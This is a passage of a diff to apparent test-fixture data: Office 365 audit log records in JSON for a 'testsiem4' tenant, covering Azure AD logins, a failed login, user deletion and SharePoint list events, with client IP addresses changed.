Id":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
-{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
-{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
-{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"175.16.199.1","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"}
 {"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
-{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
-{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
-{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
